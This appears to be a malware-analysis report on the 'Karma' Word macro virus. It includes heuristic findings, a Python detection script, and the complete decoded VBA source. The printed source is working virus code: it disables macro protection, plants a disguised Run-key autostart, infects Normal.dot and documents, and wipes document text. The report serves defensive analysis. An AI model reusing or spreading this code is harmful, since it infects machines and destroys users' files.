Verdict: MALICIOUS (Risk Score 296)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- T1105 Ingress Tool Transfer
The VBA macro is a Word 2000 macro virus ("The Karma Virus v1.00", per its own comment). Its Document_Open subroutine first turns off Word's VirusProtection, ConfirmConversions and SaveNormalPrompt options, then uses System.PrivateProfileString to write two registry values: the Word macro security level under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security (Level = 1, i.e. Low) and a Run value named 'Norton Auto-Protect' under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run that points at C:\Windows\Backup.vbs. It dumps the first 85 lines of its own code module to C:\Windows\Karma.drv, marks that file hidden and system (SetAttr 6), and replaces the code module of both the Normal template and the active document with it; Karma.drv is therefore the virus body used for infection, not a separate payload. It then writes the VBScript C:\Windows\Backup.vbs (also hidden/system), whose body obtains WScript.Shell and a Word.Application object through WScript.CreateObject, re-infects the Normal template from Karma.drv, drops a 'The WalruS.url' shortcut to www.WalruS.8k.com into C:\Windows\Favorites, rewrites RegisteredOwner to 'The WalruS', and sets the Explorer NoClose policy (showing a fake 'Microsoft Windows Shutdown Error' message box when the current minute is 30). A Document_Close subroutine keeps a per-document open counter in WIN.INI and, once it exceeds 250, deletes the document text and replaces it with 'This Document has expired due to Bad Karma'. No download or network transfer routine is present in the script; the only network-related artefact is the .url favorite.
Heuristics (7)
- ClamAV: Win.Trojan.Karma-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Karma-2
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script, shown with one line of context on either side:
    Print #1, "Dim Shortcut, Fave"
    Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
    Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")"
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script:
    Print #1, "Dim Shortcut, Fave"
    Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
    Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")"
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script:
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    On Error Resume Next
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script:
    On Error Resume Next
    sFileName = Environ("Windir")
    If Right(sFileName, 1) <> "\" Then
- Reference to Windows Script Host (high, SC_STR_WSCRIPT)
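The heuristics above are per-line pattern matches over the decoded macro source, and the summary's persistence indicators (the Run value and the two dropped files) can be pulled from the same source. The Python below is an added example, not the analyzer's code and not part of the sample: it re-implements the four OLE_VBA_* rules the report lists, adds three assumed rule IDs (OLE_VBA_FILEWRITE, OLE_VBA_RUNKEY, OLE_VBA_SECURITY_DOWNGRADE, plus OLE_VBA_SETATTR_HIDDEN) for behaviour the summary describes, and extracts the Run value and dropped-file paths so a self-installed autostart can be flagged. The severities of the assumed rules, the score weights and the resulting score are assumptions; the score is not the report's 296. The input is a constructed excerpt of the macro shown in the preview below.

```python
"""Static VBA triage that mirrors the heuristics in this report.

Added example; not the analyzer's code and not part of the sample. The
rule IDs OLE_VBA_DOCOPEN/WSCRIPT/CREATEOBJ/ENVIRON are the report's; the
other rule IDs, the severities and the score weights are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed input: an excerpt of the decoded macro from the report, kept
# to the lines the heuristics and the persistence extractor act on.
SAMPLE_VBA = r'''Private Sub Document_Open()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Norton Auto-Protect") = "C:\Windows\Backup.vbs"
Open "C:\Windows\Karma.drv" For Output As #1
Close #1
SetAttr ("C:\Windows\Karma.drv"), 6
Open "C:\Windows\Backup.vbs" For Output As #1
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")"
Close #1
SetAttr ("C:\Windows\Backup.vbs"), 6
End Sub
Private Sub Document_Close()
sFileName = Environ("Windir")
End Sub
'''


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line_no: int
    line: str


# Per-line patterns. The first four rule IDs and severities are the report's.
RULES = [
    ("OLE_VBA_DOCOPEN", "low", r"\bSub\s+(Document_Open|AutoOpen)\b"),
    ("OLE_VBA_WSCRIPT", "critical", r"WScript\.Shell"),
    ("OLE_VBA_CREATEOBJ", "high", r"\bCreateObject\s*\("),
    ("OLE_VBA_ENVIRON", "low", r"\bEnviron\s*\("),
    # Assumed rule IDs (not in the report) for behaviour the summary describes.
    ("OLE_VBA_FILEWRITE", "medium", r'\bOpen\s+"[^"]+"\s+For\s+Output\b'),
    ("OLE_VBA_RUNKEY", "critical", r"CurrentVersion\\Run\b"),
    ("OLE_VBA_SECURITY_DOWNGRADE", "critical", r'Word\\Security"\s*,\s*"Level"\s*\)\s*=\s*1\b'),
]
SEVERITY_WEIGHT = {"critical": 40, "high": 20, "medium": 10, "low": 5}  # assumed weights

SETATTR_RE = re.compile(r"\bSetAttr\b.*?,\s*(\d+)", re.IGNORECASE)
RUNKEY_RE = re.compile(
    r'PrivateProfileString\(\s*""\s*,\s*"(?P<key>HKEY_[^"]*\\CurrentVersion\\Run)"'
    r'\s*,\s*"(?P<name>[^"]+)"\s*\)\s*=\s*"(?P<value>[^"]+)"',
    re.IGNORECASE,
)
FILEWRITE_RE = re.compile(r'\bOpen\s+"(?P<path>[^"]+)"\s+For\s+Output', re.IGNORECASE)


def scan(vba_source: str) -> list[Finding]:
    """Run every rule over every line; one Finding per (rule, line) hit."""
    findings: list[Finding] = []
    for no, line in enumerate(vba_source.splitlines(), 1):
        for rule, severity, pattern in RULES:
            if re.search(pattern, line, re.IGNORECASE):
                findings.append(Finding(rule, severity, no, line.strip()))
        m = SETATTR_RE.search(line)
        if m and int(m.group(1)) & 2:  # vbHidden bit set: the dropped file is hidden
            findings.append(Finding("OLE_VBA_SETATTR_HIDDEN", "medium", no, line.strip()))
    return findings


def risk_score(findings: list[Finding]) -> int:
    """Sum of weights over distinct rules, so repeated hits of one rule do not inflate it."""
    worst = {f.rule: f.severity for f in findings}
    return sum(SEVERITY_WEIGHT[sev] for sev in worst.values())


def persistence_iocs(vba_source: str) -> dict[str, list]:
    """Run values written via System.PrivateProfileString and files opened for output."""
    run_keys, dropped = [], []
    for line in vba_source.splitlines():
        if m := RUNKEY_RE.search(line):
            run_keys.append((m["key"], m["name"], m["value"]))
        if m := FILEWRITE_RE.search(line):
            dropped.append(m["path"])
    return {"run_keys": run_keys, "dropped_files": dropped}


def self_persisting(vba_source: str) -> list[str]:
    """Names of Run values whose target is a file the macro itself writes."""
    iocs = persistence_iocs(vba_source)
    dropped = {p.lower() for p in iocs["dropped_files"]}
    return [name for _, name, value in iocs["run_keys"] if value.lower() in dropped]


if __name__ == "__main__":
    hits = scan(SAMPLE_VBA)
    for f in hits:
        print(f"{f.severity:<8} {f.rule:<26} line {f.line_no}: {f.line}")
    print("score:", risk_score(hits))
    print("iocs:", persistence_iocs(SAMPLE_VBA))
    print("self-installed Run values:", self_persisting(SAMPLE_VBA))
```

Scoring counts each rule once, so the two Print lines that both match OLE_VBA_CREATEOBJ do not double its weight. The Run-value check is what turns the two findings "writes a Run value" and "writes a file" into the single, stronger statement that the document installs its own autostart; on a real host the same pairing (Run value target equals a freshly written hidden file under the Windows directory) is the thing to confirm first during triage.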
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4166 bytes | fbb30f7d3239a59ccbbd741dd72feb38584bbe7ba8a1eacac74302310aafe60d | ClamAV: Doc.Trojan.Karma-1 | unlikely |
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
' The Karma Virus v1.00 with VBS Backup/Payload
' By WalruS 09/00
' Do nothing in the default blank document; only run from a real document.
If ActiveDocument.Name = "Document1" Then Exit Sub
' Code modules of the Normal template and of the open document: both are infection targets.
Set Nor = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set Doc = ActiveDocument.VBProject.VBComponents(1).CodeModule
' Silence the macro warning and the prompts that would reveal the change to Normal.dot.
With Options
.VirusProtection = False
.ConfirmConversions = False
.SaveNormalPrompt = False
End With
Application.DisplayStatusBar = False
' Word 2000 (Office 9.0) macro security set to Low, then a Run value named to look like Norton.
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Norton Auto-Protect") = "C:\Windows\Backup.vbs"
' Dump the first 85 lines of this module (the virus body) to a file marked hidden + system (6).
Open "C:\Windows\Karma.drv" For Output As #1
Print #1, VBProject.VBComponents(1).CodeModule.Lines(1, 85)
Close #1
SetAttr ("C:\Windows\Karma.drv"), 6
' Replace both code modules with the Karma.drv copy: infects Normal.dot and the current document.
Nor.DeleteLines 1, Nor.CountOfLines: Nor.AddFromFile ("C:\Windows\Karma.drv")
Doc.DeleteLines 1, Doc.CountOfLines: Doc.AddFromFile ("C:\Windows\Karma.drv")
' Write the VBScript that the Run value launches; it re-infects Normal.dot from Karma.drv via Word automation.
Open "C:\Windows\Backup.vbs" For Output As #1
Print #1, "' Backup.vbs for Karma by The WalruS"
Print #1, "On Error Resume Next"
Print #1, "Dim WSHShell"
Print #1, "Dim Shortcut, Fave"
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")"
Print #1, "Backup.Options.VirusProtection = False"
Print #1, "Backup.Options.SaveNormalPrompt = False"
Print #1, "For x = 1 To Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1"
Print #1, "Next"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (""C:\Windows\Karma.drv"")"
Print #1, "Backup.Application.Quit"
' Remaining VBS side effects: a favorite pointing at the author's site, RegisteredOwner, and the Explorer NoClose policy.
Print #1, "Fave = (""C:\Windows\Favorites"")"
Print #1, "Set Shortcut = WSHShell.CreateShortcut(Fave & ""\The WalruS.url"")"
Print #1, "Shortcut.TargetPath = WSHShell.ExpandEnvironmentStrings(""www.WalruS.8k.com"")"
Print #1, "Shortcut.Save"
Print #1, "WSHShell.RegWrite ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner"", ""The WalruS"""
Print #1, "If Minute(Now) = 30 Then"
Print #1, "WSHShell.RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose"", ""1"""
Print #1, "MsgBox ""Microsoft Windows Shutdown Error"", vbExclamation, ""Bad Karma"""
Print #1, "Else"
Print #1, "WSHShell.RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose"", ""WalruS"""
Print #1, "End If"
Close #1
SetAttr ("C:\Windows\Backup.vbs"), 6
End Sub
' Payload: a per-document counter kept in WIN.INI; once it passes 250 the document text is destroyed.
Private Sub Document_Close()
On Error Resume Next
sFileName = Environ("Windir")
If Right(sFileName, 1) <> "\" Then
sFileName = sFileName & "\"
End If
sFileName = sFileName & "WIN.INI"
sCounter = System.PrivateProfileString(sFileName, ActiveDocument.FullName, "Counter")
sCounter = Val(sCounter) + 1
System.PrivateProfileString(sFileName, ActiveDocument.FullName, "Counter") = sCounter
If Val(sCounter) > "250" Then
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Set myRange = ActiveDocument.Paragraphs(1).Range
With myRange.Font
.Bold = True
.Name = "Space Woozies"
.Size = 100
End With
Selection.TypeText "This Document has expired due to Bad Karma"
End If
' Save so the (now infected) document carries the virus.
If ActiveDocument.Saved = False Then ActiveDocument.Save
End Sub
```